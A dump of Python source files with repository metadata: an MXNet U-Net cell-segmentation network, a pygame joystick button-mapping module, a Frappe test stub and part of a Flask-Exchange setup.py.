else:
y = x
xd.append(self.down[n](y))
return xd
class batchconvstyle(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(batchconvstyle, self).__init__(**kwargs)
with self.name_scope():
self.conv = batchconv(nconv, 3)
if concatenation:
self.full = nn.Dense(nconv*2)
else:
self.full = nn.Dense(nconv)
self.concatenation = concatenation
def hybrid_forward(self, F, style, x, y=None):
if y is not None:
if self.concatenation:
x = F.concat(y, x, dim=1)
else:
x = x + y
feat = self.full(style)
y = F.broadcast_add(x, feat.expand_dims(-1).expand_dims(-1))
y = self.conv(y)
return y
class convup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(convup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv, 3))
self.conv.add(batchconvstyle(nconv, concatenation))
def hybrid_forward(self, F, x, y, style):
x = self.conv[0](x)
x = self.conv[1](style, x, y)
return x
class resup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(resup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv,3))
self.conv.add(batchconvstyle(nconv, concatenation))
self.conv.add(batchconvstyle(nconv))
self.conv.add(batchconvstyle(nconv))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x, y, style):
x = self.proj(x) + self.conv[1](style, self.conv[0](x), y)
x = x + self.conv[3](style, self.conv[2](style, x))
return x
class upsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, concatenation=False, **kwargs):
super(upsample, self).__init__(**kwargs)
with self.name_scope():
self.up = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.up.add(resup(nbase[n], concatenation=concatenation))
else:
self.up.add(convup(nbase[n], concatenation=concatenation))
def hybrid_forward(self, F, style, xd):
x= self.up[-1](xd[-1], xd[-1], style)
for n in range(len(self.up)-2,-1,-1):
x= F.UpSampling(x, scale=2, sample_type='nearest')
x = self.up[n](x, xd[n], style)
return x
class make_style(nn.HybridBlock):
def __init__(self, **kwargs):
super(make_style, self).__init__(**kwargs)
with self.name_scope():
self.pool_all = nn.GlobalAvgPool2D()
self.flatten = nn.Flatten()
def hybrid_forward(self, F, x0):
style = self.pool_all(x0)
style = self.flatten(style)
style = F.broadcast_div(style , F.sum(style**2, axis=1).expand_dims(1)**.5)
return style
class CPnet(gluon.HybridBlock):
def __init__(self, nbase, nout, residual_on=True, style_on=True, concatenation=False, **kwargs):
super(CPnet, self).__init__(**kwargs)
with self.name_scope():
self.nbase = nbase
self.downsample = downsample(nbase, residual_on=residual_on)
self.upsample = upsample(nbase, residual_on=residual_on, concatenation=concatenation)
self.output = batchconv(nout, 1)
self.make_style = make_style()
self.style_on = style_on
def hybrid_forward(self, F, data):
#data = self.conv1(data)
T0 = self.downsample(data)
style = self.make_style(T0[-1])
style0 = style
if not self.style_on:
style = style * 0
T0 = self.upsample(style, T0)
T0 = self.output(T0)
return T0, style0
def save_model(self, filename):
self.save_parameters(filename)
def load_model(self, filename, cpu=None):
self.load_parameters(filename)
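# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# CPnet above is a gluon HybridBlock: downsample() builds the encoder, make_style() pools the
# deepest feature map into a normalised style vector, and upsample() decodes back to the input
# resolution before the 1x1 output head. The nbase/nout values and the 224x224 two-channel
# dummy input below are illustrative choices, not the cellpose defaults.
if __name__ == '__main__':
    net = CPnet(nbase=[32, 64, 128, 256], nout=3, residual_on=True, style_on=True)
    net.initialize()
    dummy = nd.zeros((1, 2, 224, 224))   # (batch, channels, height, width)
    flows, style = net(dummy)
    print(flows.shape, style.shape)      # expected: (1, 3, 224, 224) and (1, 256)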
| 33.346154
| 100
| 0.560409
|
from mxnet import gluon, nd
from mxnet.gluon import nn
import numpy as np
nfeat = 128
sz = [3, 3, 3, 3, 3]
sz2 = [3, 3, 3, 3, 3]
szf = [1]
def total_variation_loss(x):
a = nd.square(x[:, :, :-1, :-1] - x[:, :, 1:, :-1])
b = nd.square(x[:, :, :-1, :-1] - x[:, :, :-1, 1:])
return nd.sum(nd.mean(nd.power(a + b, 1.25), axis=(2,3)))
def convbatchrelu(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
nn.BatchNorm(axis=1),
nn.Activation('relu'),
)
return conv
def batchconv(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Activation('relu'),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
def batchconv0(nconv, sz):
conv = nn.HybridSequential()
with conv.name_scope():
conv.add(
nn.BatchNorm(axis=1),
nn.Conv2D(nconv, kernel_size=sz, padding=sz//2),
)
return conv
class resdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(resdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(4):
self.conv.add( batchconv(nconv, 3))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x):
x = self.proj(x) + self.conv[1](self.conv[0](x))
x = x + self.conv[3](self.conv[2](x))
return x
class convdown(nn.HybridBlock):
def __init__(self, nconv, **kwargs):
super(convdown, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
for t in range(2):
self.conv.add(batchconv(nconv, 3))
def hybrid_forward(self, F, x):
x = self.conv[0](x)
x = self.conv[1](x)
return x
class downsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, **kwargs):
super(downsample, self).__init__(**kwargs)
with self.name_scope():
self.down = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.down.add(resdown(nbase[n]))
else:
self.down.add(convdown(nbase[n]))
def hybrid_forward(self, F, x):
xd = []
for n in range(len(self.down)):
if n>0:
y = F.Pooling(xd[n-1], kernel=(2,2), stride=(2,2), pool_type='max')
else:
y = x
xd.append(self.down[n](y))
return xd
class batchconvstyle(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(batchconvstyle, self).__init__(**kwargs)
with self.name_scope():
self.conv = batchconv(nconv, 3)
if concatenation:
self.full = nn.Dense(nconv*2)
else:
self.full = nn.Dense(nconv)
self.concatenation = concatenation
def hybrid_forward(self, F, style, x, y=None):
if y is not None:
if self.concatenation:
x = F.concat(y, x, dim=1)
else:
x = x + y
feat = self.full(style)
y = F.broadcast_add(x, feat.expand_dims(-1).expand_dims(-1))
y = self.conv(y)
return y
class convup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(convup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv, 3))
self.conv.add(batchconvstyle(nconv, concatenation))
def hybrid_forward(self, F, x, y, style):
x = self.conv[0](x)
x = self.conv[1](style, x, y)
return x
class resup(nn.HybridBlock):
def __init__(self, nconv, concatenation=False, **kwargs):
super(resup, self).__init__(**kwargs)
with self.name_scope():
self.conv = nn.HybridSequential()
self.conv.add(batchconv(nconv,3))
self.conv.add(batchconvstyle(nconv, concatenation))
self.conv.add(batchconvstyle(nconv))
self.conv.add(batchconvstyle(nconv))
self.proj = batchconv0(nconv, 1)
def hybrid_forward(self, F, x, y, style):
x = self.proj(x) + self.conv[1](style, self.conv[0](x), y)
x = x + self.conv[3](style, self.conv[2](style, x))
return x
class upsample(nn.HybridBlock):
def __init__(self, nbase, residual_on=True, concatenation=False, **kwargs):
super(upsample, self).__init__(**kwargs)
with self.name_scope():
self.up = nn.HybridSequential()
for n in range(len(nbase)):
if residual_on:
self.up.add(resup(nbase[n], concatenation=concatenation))
else:
self.up.add(convup(nbase[n], concatenation=concatenation))
def hybrid_forward(self, F, style, xd):
x= self.up[-1](xd[-1], xd[-1], style)
for n in range(len(self.up)-2,-1,-1):
x= F.UpSampling(x, scale=2, sample_type='nearest')
x = self.up[n](x, xd[n], style)
return x
class make_style(nn.HybridBlock):
def __init__(self, **kwargs):
super(make_style, self).__init__(**kwargs)
with self.name_scope():
self.pool_all = nn.GlobalAvgPool2D()
self.flatten = nn.Flatten()
def hybrid_forward(self, F, x0):
style = self.pool_all(x0)
style = self.flatten(style)
style = F.broadcast_div(style , F.sum(style**2, axis=1).expand_dims(1)**.5)
return style
class CPnet(gluon.HybridBlock):
def __init__(self, nbase, nout, residual_on=True, style_on=True, concatenation=False, **kwargs):
super(CPnet, self).__init__(**kwargs)
with self.name_scope():
self.nbase = nbase
self.downsample = downsample(nbase, residual_on=residual_on)
self.upsample = upsample(nbase, residual_on=residual_on, concatenation=concatenation)
self.output = batchconv(nout, 1)
self.make_style = make_style()
self.style_on = style_on
def hybrid_forward(self, F, data):
T0 = self.downsample(data)
style = self.make_style(T0[-1])
style0 = style
if not self.style_on:
style = style * 0
T0 = self.upsample(style, T0)
T0 = self.output(T0)
return T0, style0
def save_model(self, filename):
self.save_parameters(filename)
def load_model(self, filename, cpu=None):
self.load_parameters(filename)
| true
| true
|
1c42124eb9ac9ec0b0d34996cbda5ac176daf67c
| 11,640
|
py
|
Python
|
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | 6
|
2022-02-10T09:07:56.000Z
|
2022-02-10T10:36:18.000Z
|
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | null | null | null |
my_pygame/joystick.py
|
francis-clairicia/Py-Game-Case
|
af2da857f2ef758051ad3c174d77f5a2deab935d
|
[
"MIT"
] | null | null | null |
# -*-coding:Utf-8-*
import os
import sys
from typing import Union, Optional, Iterator
import pickle
import pygame
class Joystick:
def __init__(self, index: int):
self.__index = index
self.__joystick = pygame.joystick.Joystick(index) if index in range(Joystick.count()) else None
self.__button_list = ["A", "B", "X", "Y", "L1", "L2", "R1", "R2", "SELECT", "START", "L3", "R3", "HOME"]
self.__axis_list = ["AXIS_LEFT_X", "AXIS_LEFT_Y", "AXIS_RIGHT_X", "AXIS_RIGHT_Y"]
self.__dpad_list = ["UP", "DOWN", "LEFT", "RIGHT"]
self.__event_type = {key: [str(), -1, 0] for key in self.button_list + self.axis_list + self.dpad_list}
self.__save_file = os.path.join(sys.path[0], "joystick.bin")
if os.path.isfile(self.__save_file):
with open(self.__save_file, "rb") as save:
self.__save = pickle.load(save)
else:
self.__save = dict()
self.set_default_layout()
self.__button_axis_return_bool = False
"""-----------------------------------------------------"""
def connected(self) -> bool:
return bool(self.__joystick is not None)
def event_connect(self, event: pygame.event.Event) -> None:
if self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED) and event.device_index == self.__index:
self.__joystick = pygame.joystick.Joystick(event.device_index)
if self.guid in self.__save:
self.__event_type = self.__save[self.guid]
else:
self.set_default_layout()
def event_disconnect(self, event: pygame.event.Event) -> None:
if not self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED) and event.instance_id == self.id:
self.__joystick.quit()
self.__joystick = None
"""------------------------------------------------------------------"""
def set_default_layout(self) -> None:
layout = {
"A": ("button", 0, 1),
"B": ("button", 1, 1),
"X": ("button", 2, 1),
"Y": ("button", 3, 1),
"L1": ("button", 4, 1),
"R1": ("button", 5, 1),
"SELECT": ("button", 6, 1),
"START": ("button", 7, 1),
"L3": ("button", 8, 1),
"R3": ("button", 9, 1),
"HOME": ("button", 10, 1),
"UP": ("hat", 0, (0, 1)),
"DOWN": ("hat", 0, (0, -1)),
"LEFT": ("hat", 0, (-1, 0)),
"RIGHT": ("hat", 0, (1, 0)),
"L2": ("axis", 2, 1),
"R2": ("axis", 5, 1),
"AXIS_LEFT_X": ("axis", 0, 0),
"AXIS_LEFT_Y": ("axis", 1, 0),
"AXIS_RIGHT_X": ("axis", 3, 0),
"AXIS_RIGHT_Y": ("axis", 4, 0),
}
for key, value in layout.items():
self.__event_type[key] = list(value)
def __save_to_file(self) -> None:
self.__save[self.guid] = dict(self.__event_type)
with open(self.__save_file, "wb") as save:
pickle.dump(self.__save, save)
"""------------------------------------------------------------------"""
@property
def button_list(self) -> list[str]:
return self.__button_list
@property
def axis_list(self) -> list[str]:
return self.__axis_list
@property
def dpad_list(self) -> list[str]:
return self.__dpad_list
"""------------------------------------------------------------------"""
def __test(self, key: str) -> tuple[str, str]:
key = key.upper()
if key.endswith(("-", "+")):
key, suffix = key[:-1], key[-1]
else:
suffix = str()
if key not in self.__event_type:
raise NameError("{} isn't recognized".format(key))
return key, suffix
def get_value(self, key: str) -> float:
key, suffix = self.__test(key)
if not self.connected():
return 0
event, index, active_state = self.__event_type[key]
active_state = {"": active_state, "-": -1, "+": 1}[suffix]
actions = {
"button": self.__joystick.get_button,
"axis": self.__joystick.get_axis,
"hat": self.__joystick.get_hat,
}
try:
state = actions[event](index)
except pygame.error:
return 0
if event == "button":
return state
if event == "hat" and isinstance(state, tuple):
return 1 if all(active_state[i] == 0 or state[i] == active_state[i] for i in range(2)) else 0
if event == "axis":
if key not in self.axis_list and self.__button_axis_return_bool:
return 1 if state >= 0.9 else 0
return self.__get_axis_value(state, active_state)
return 0
def __get_axis_value(self, state: float, active_state: int) -> float:
if active_state != 0:
if (active_state > 0 and state < 0) or (active_state < 0 and state > 0):
return 0
return abs(state)
return state
def search_key(self, event_type: str, index: int, hat_value: Optional[tuple[int, int]] = None, axis: Optional[int] = None) -> Union[str, None]:
for key, (event, idx, value) in self.__event_type.items():
if event == event_type and idx == index and (event != "hat" or value == hat_value) and (event != "axis" or axis is None or value == axis):
return key
return None
def __getitem__(self, key: str) -> Union[int, float]:
key = self.__test(key)[0]
infos = self.__event_type[key]
return infos[1]
def __setitem__(self, key: str, value: tuple[int, int, tuple[int, int]]) -> None:
self.set_event(key, *value)
def set_event(self, key: str, event: int, index: int, hat_value: Optional[tuple[int, int]] = (0, 0)) -> None:
key = self.__test(key)[0]
event_map = {
pygame.JOYBUTTONDOWN: ("button", index, 1),
pygame.JOYAXISMOTION: ("axis", index, 0 if key not in self.button_list + self.dpad_list else 1),
pygame.JOYHATMOTION: ("hat", index, hat_value)
}
if event in event_map:
self.__event_type[key] = list(event_map[event])
self.__save_to_file()
def set_button_axis(self, state: bool) -> None:
self.__button_axis_return_bool = bool(state)
def get_button_axis_state(self) -> bool:
return self.__button_axis_return_bool
"""------------------------------------------------------------------"""
@property
def device_index(self) -> int:
return self.__index
@property
def id(self) -> int:
return self.__joystick.get_instance_id() if self.connected() else -1
@property
def guid(self) -> str:
return self.__joystick.get_guid() if self.connected() else str()
@property
def name(self) -> str:
return self.__joystick.get_name() if self.connected() else str()
@property
def power_level(self) -> str:
return self.__joystick.get_power_level() if self.connected() else "unknown"
"""------------------------------------------------------------------"""
@staticmethod
def count() -> int:
return pygame.joystick.get_count()
@staticmethod
def list() -> tuple[str, ...]:
try:
joystick = tuple(pygame.joystick.Joystick(i).get_name() for i in range(Joystick.count()))
except pygame.error:
joystick = tuple()
return joystick
"""------------------------------------------------------------------"""
A = property(lambda self: self.__getitem__("A"), lambda self, value: self.set_event("A", *value))
B = property(lambda self: self.__getitem__("B"), lambda self, value: self.set_event("B", *value))
X = property(lambda self: self.__getitem__("X"), lambda self, value: self.set_event("X", *value))
Y = property(lambda self: self.__getitem__("Y"), lambda self, value: self.set_event("Y", *value))
L1 = property(lambda self: self.__getitem__("L1"), lambda self, value: self.set_event("L1", *value))
L2 = property(lambda self: self.__getitem__("L2"), lambda self, value: self.set_event("L2", *value))
L3 = property(lambda self: self.__getitem__("L3"), lambda self, value: self.set_event("L3", *value))
R1 = property(lambda self: self.__getitem__("R1"), lambda self, value: self.set_event("R1", *value))
R2 = property(lambda self: self.__getitem__("R2"), lambda self, value: self.set_event("R2", *value))
R3 = property(lambda self: self.__getitem__("R3"), lambda self, value: self.set_event("R3", *value))
SELECT = property(lambda self: self.__getitem__("SELECT"), lambda self, value: self.set_event("SELECT", *value))
START = property(lambda self: self.__getitem__("START"), lambda self, value: self.set_event("START", *value))
UP = property(lambda self: self.__getitem__("UP"), lambda self, value: self.set_event("UP", *value))
DOWN = property(lambda self: self.__getitem__("DOWN"), lambda self, value: self.set_event("DOWN", *value))
LEFT = property(lambda self: self.__getitem__("LEFT"), lambda self, value: self.set_event("LEFT", *value))
RIGHT = property(lambda self: self.__getitem__("RIGHT"), lambda self, value: self.set_event("RIGHT", *value))
AXIS_LEFT_X = property(lambda self: self.__getitem__("AXIS_LEFT_X"), lambda self, value: self.set_event("AXIS_LEFT_X", *value))
AXIS_LEFT_Y = property(lambda self: self.__getitem__("AXIS_LEFT_Y"), lambda self, value: self.set_event("AXIS_LEFT_Y", *value))
AXIS_RIGHT_X = property(lambda self: self.__getitem__("AXIS_RIGHT_X"), lambda self, value: self.set_event("AXIS_RIGHT_X", *value))
AXIS_RIGHT_Y = property(lambda self: self.__getitem__("AXIS_RIGHT_Y"), lambda self, value: self.set_event("AXIS_RIGHT_Y", *value))
class JoystickList(object):
__slots__ = ("__list",)
def __init__(self):
self.__list = list()
def set(self, nb_joystick: int) -> None:
self.__list = [Joystick(i) for i in range(nb_joystick)]
def __iter__(self) -> Iterator[Joystick]:
return iter(self.__list)
def __bool__(self) -> bool:
return bool(self.__list)
def __getitem__(self, index: int) -> Union[Joystick, None]:
return self.get_joy_by_device_index(index)
def get_joy_by_device_index(self, index: int) -> Union[Joystick, None]:
for joy in self:
if joy.device_index == index:
return joy
return None
def get_joy_by_instance_id(self, instance_id: int) -> Union[Joystick, None]:
for joy in self:
if joy.id == instance_id:
return joy
return None
def event_connect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED):
joystick = self.get_joy_by_device_index(event.device_index)
if joystick is not None:
joystick.event_connect(event)
def event_disconnect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED):
joystick = self.get_joy_by_instance_id(event.instance_id)
if joystick is not None:
joystick.event_disconnect(event)
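# --- Illustrative usage sketch (editor's addition, not part of the original module) ---
# JoystickList keeps one Joystick per device slot and forwards pygame's connect/disconnect
# events to the matching instance; Joystick.get_value() then resolves a logical name such as
# "A" or "AXIS_LEFT_X" through the saved layout. The event-loop skeleton below is illustrative.
if __name__ == "__main__":
    pygame.init()
    joysticks = JoystickList()
    joysticks.set(Joystick.count())
    running = True
    while running:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            joysticks.event_connect(event)
            joysticks.event_disconnect(event)
        player_one = joysticks[0]
        if player_one is not None and player_one.connected() and player_one.get_value("A"):
            print("A pressed, left stick X:", player_one.get_value("AXIS_LEFT_X"))
        pygame.time.wait(16)   # roughly 60 polls per second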
| 42.173913
| 150
| 0.564089
|
import os
import sys
from typing import Union, Optional, Iterator
import pickle
import pygame
class Joystick:
def __init__(self, index: int):
self.__index = index
self.__joystick = pygame.joystick.Joystick(index) if index in range(Joystick.count()) else None
self.__button_list = ["A", "B", "X", "Y", "L1", "L2", "R1", "R2", "SELECT", "START", "L3", "R3", "HOME"]
self.__axis_list = ["AXIS_LEFT_X", "AXIS_LEFT_Y", "AXIS_RIGHT_X", "AXIS_RIGHT_Y"]
self.__dpad_list = ["UP", "DOWN", "LEFT", "RIGHT"]
self.__event_type = {key: [str(), -1, 0] for key in self.button_list + self.axis_list + self.dpad_list}
self.__save_file = os.path.join(sys.path[0], "joystick.bin")
if os.path.isfile(self.__save_file):
with open(self.__save_file, "rb") as save:
self.__save = pickle.load(save)
else:
self.__save = dict()
self.set_default_layout()
self.__button_axis_return_bool = False
def connected(self) -> bool:
return bool(self.__joystick is not None)
def event_connect(self, event: pygame.event.Event) -> None:
if self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED) and event.device_index == self.__index:
self.__joystick = pygame.joystick.Joystick(event.device_index)
if self.guid in self.__save:
self.__event_type = self.__save[self.guid]
else:
self.set_default_layout()
def event_disconnect(self, event: pygame.event.Event) -> None:
if not self.connected():
return
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED) and event.instance_id == self.id:
self.__joystick.quit()
self.__joystick = None
def set_default_layout(self) -> None:
layout = {
"A": ("button", 0, 1),
"B": ("button", 1, 1),
"X": ("button", 2, 1),
"Y": ("button", 3, 1),
"L1": ("button", 4, 1),
"R1": ("button", 5, 1),
"SELECT": ("button", 6, 1),
"START": ("button", 7, 1),
"L3": ("button", 8, 1),
"R3": ("button", 9, 1),
"HOME": ("button", 10, 1),
"UP": ("hat", 0, (0, 1)),
"DOWN": ("hat", 0, (0, -1)),
"LEFT": ("hat", 0, (-1, 0)),
"RIGHT": ("hat", 0, (1, 0)),
"L2": ("axis", 2, 1),
"R2": ("axis", 5, 1),
"AXIS_LEFT_X": ("axis", 0, 0),
"AXIS_LEFT_Y": ("axis", 1, 0),
"AXIS_RIGHT_X": ("axis", 3, 0),
"AXIS_RIGHT_Y": ("axis", 4, 0),
}
for key, value in layout.items():
self.__event_type[key] = list(value)
def __save_to_file(self) -> None:
self.__save[self.guid] = dict(self.__event_type)
with open(self.__save_file, "wb") as save:
pickle.dump(self.__save, save)
@property
def button_list(self) -> list[str]:
return self.__button_list
@property
def axis_list(self) -> list[str]:
return self.__axis_list
@property
def dpad_list(self) -> list[str]:
return self.__dpad_list
def __test(self, key: str) -> tuple[str, str]:
key = key.upper()
if key.endswith(("-", "+")):
key, suffix = key[:-1], key[-1]
else:
suffix = str()
if key not in self.__event_type:
raise NameError("{} isn't recognized".format(key))
return key, suffix
def get_value(self, key: str) -> float:
key, suffix = self.__test(key)
if not self.connected():
return 0
event, index, active_state = self.__event_type[key]
active_state = {"": active_state, "-": -1, "+": 1}[suffix]
actions = {
"button": self.__joystick.get_button,
"axis": self.__joystick.get_axis,
"hat": self.__joystick.get_hat,
}
try:
state = actions[event](index)
except pygame.error:
return 0
if event == "button":
return state
if event == "hat" and isinstance(state, tuple):
return 1 if all(active_state[i] == 0 or state[i] == active_state[i] for i in range(2)) else 0
if event == "axis":
if key not in self.axis_list and self.__button_axis_return_bool:
return 1 if state >= 0.9 else 0
return self.__get_axis_value(state, active_state)
return 0
def __get_axis_value(self, state: float, active_state: int) -> float:
if active_state != 0:
if (active_state > 0 and state < 0) or (active_state < 0 and state > 0):
return 0
return abs(state)
return state
def search_key(self, event_type: str, index: int, hat_value: Optional[tuple[int, int]] = None, axis: Optional[int] = None) -> Union[str, None]:
for key, (event, idx, value) in self.__event_type.items():
if event == event_type and idx == index and (event != "hat" or value == hat_value) and (event != "axis" or axis is None or value == axis):
return key
return None
def __getitem__(self, key: str) -> Union[int, float]:
key = self.__test(key)[0]
infos = self.__event_type[key]
return infos[1]
def __setitem__(self, key: str, value: tuple[int, int, tuple[int, int]]) -> None:
self.set_event(key, *value)
def set_event(self, key: str, event: int, index: int, hat_value: Optional[tuple[int, int]] = (0, 0)) -> None:
key = self.__test(key)[0]
event_map = {
pygame.JOYBUTTONDOWN: ("button", index, 1),
pygame.JOYAXISMOTION: ("axis", index, 0 if key not in self.button_list + self.dpad_list else 1),
pygame.JOYHATMOTION: ("hat", index, hat_value)
}
if event in event_map:
self.__event_type[key] = list(event_map[event])
self.__save_to_file()
def set_button_axis(self, state: bool) -> None:
self.__button_axis_return_bool = bool(state)
def get_button_axis_state(self) -> bool:
return self.__button_axis_return_bool
@property
def device_index(self) -> int:
return self.__index
@property
def id(self) -> int:
return self.__joystick.get_instance_id() if self.connected() else -1
@property
def guid(self) -> str:
return self.__joystick.get_guid() if self.connected() else str()
@property
def name(self) -> str:
return self.__joystick.get_name() if self.connected() else str()
@property
def power_level(self) -> str:
return self.__joystick.get_power_level() if self.connected() else "unknown"
@staticmethod
def count() -> int:
return pygame.joystick.get_count()
@staticmethod
def list() -> tuple[str, ...]:
try:
joystick = tuple(pygame.joystick.Joystick(i).get_name() for i in range(Joystick.count()))
except pygame.error:
joystick = tuple()
return joystick
A = property(lambda self: self.__getitem__("A"), lambda self, value: self.set_event("A", *value))
B = property(lambda self: self.__getitem__("B"), lambda self, value: self.set_event("B", *value))
X = property(lambda self: self.__getitem__("X"), lambda self, value: self.set_event("X", *value))
Y = property(lambda self: self.__getitem__("Y"), lambda self, value: self.set_event("Y", *value))
L1 = property(lambda self: self.__getitem__("L1"), lambda self, value: self.set_event("L1", *value))
L2 = property(lambda self: self.__getitem__("L2"), lambda self, value: self.set_event("L2", *value))
L3 = property(lambda self: self.__getitem__("L3"), lambda self, value: self.set_event("L3", *value))
R1 = property(lambda self: self.__getitem__("R1"), lambda self, value: self.set_event("R1", *value))
R2 = property(lambda self: self.__getitem__("R2"), lambda self, value: self.set_event("R2", *value))
R3 = property(lambda self: self.__getitem__("R3"), lambda self, value: self.set_event("R3", *value))
SELECT = property(lambda self: self.__getitem__("SELECT"), lambda self, value: self.set_event("SELECT", *value))
START = property(lambda self: self.__getitem__("START"), lambda self, value: self.set_event("START", *value))
UP = property(lambda self: self.__getitem__("UP"), lambda self, value: self.set_event("UP", *value))
DOWN = property(lambda self: self.__getitem__("DOWN"), lambda self, value: self.set_event("DOWN", *value))
LEFT = property(lambda self: self.__getitem__("LEFT"), lambda self, value: self.set_event("LEFT", *value))
RIGHT = property(lambda self: self.__getitem__("RIGHT"), lambda self, value: self.set_event("RIGHT", *value))
AXIS_LEFT_X = property(lambda self: self.__getitem__("AXIS_LEFT_X"), lambda self, value: self.set_event("AXIS_LEFT_X", *value))
AXIS_LEFT_Y = property(lambda self: self.__getitem__("AXIS_LEFT_Y"), lambda self, value: self.set_event("AXIS_LEFT_Y", *value))
AXIS_RIGHT_X = property(lambda self: self.__getitem__("AXIS_RIGHT_X"), lambda self, value: self.set_event("AXIS_RIGHT_X", *value))
AXIS_RIGHT_Y = property(lambda self: self.__getitem__("AXIS_RIGHT_Y"), lambda self, value: self.set_event("AXIS_RIGHT_Y", *value))
class JoystickList(object):
__slots__ = ("__list",)
def __init__(self):
self.__list = list()
def set(self, nb_joystick: int) -> None:
self.__list = [Joystick(i) for i in range(nb_joystick)]
def __iter__(self) -> Iterator[Joystick]:
return iter(self.__list)
def __bool__(self) -> bool:
return bool(self.__list)
def __getitem__(self, index: int) -> Union[Joystick, None]:
return self.get_joy_by_device_index(index)
def get_joy_by_device_index(self, index: int) -> Union[Joystick, None]:
for joy in self:
if joy.device_index == index:
return joy
return None
def get_joy_by_instance_id(self, instance_id: int) -> Union[Joystick, None]:
for joy in self:
if joy.id == instance_id:
return joy
return None
def event_connect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEADDED, pygame.JOYDEVICEADDED):
joystick = self.get_joy_by_device_index(event.device_index)
if joystick is not None:
joystick.event_connect(event)
def event_disconnect(self, event: pygame.event.Event) -> None:
if event.type in (pygame.CONTROLLERDEVICEREMOVED, pygame.JOYDEVICEREMOVED):
joystick = self.get_joy_by_instance_id(event.instance_id)
if joystick is not None:
joystick.event_disconnect(event)
| true
| true
|
1c421365662f9c384e027d6403a99b7bfe2c0777
| 152
|
py
|
Python
|
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
slnee_quality/slnee_quality/doctype/request/test_request.py
|
erpcloudsystems/slnee_quality
|
ad81f029a795ee073768c7c933cd91e61b6df059
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, erpcloud.systems and Contributors
# See license.txt
# import frappe
import unittest
class TestRequest(unittest.TestCase):
pass
| 16.888889
| 55
| 0.782895
|
import unittest
class TestRequest(unittest.TestCase):
pass
| true
| true
|
1c42146f0e6735ced4e1a4fbe2550582ad5298af
| 4,187
|
py
|
Python
|
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
setup.py
|
jscurtu/flask-exchange
|
a2dddb3e03c14c488a90ee63df4858d832d4e841
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'Flask-Exchange'
DESCRIPTION = 'Exchange support for Flask using ExchangeLib.'
URL = 'https://github.com/jscurtu/flask-exchange'
EMAIL = 'jscurtu@gmail.com'
AUTHOR = 'Jason Scurtu'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = '0.0.2'
# What packages are required for this module to be executed?
REQUIRED = [
'flask>=0.10.1', 'exchangelib>=1.12.0', 'urllib3'
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
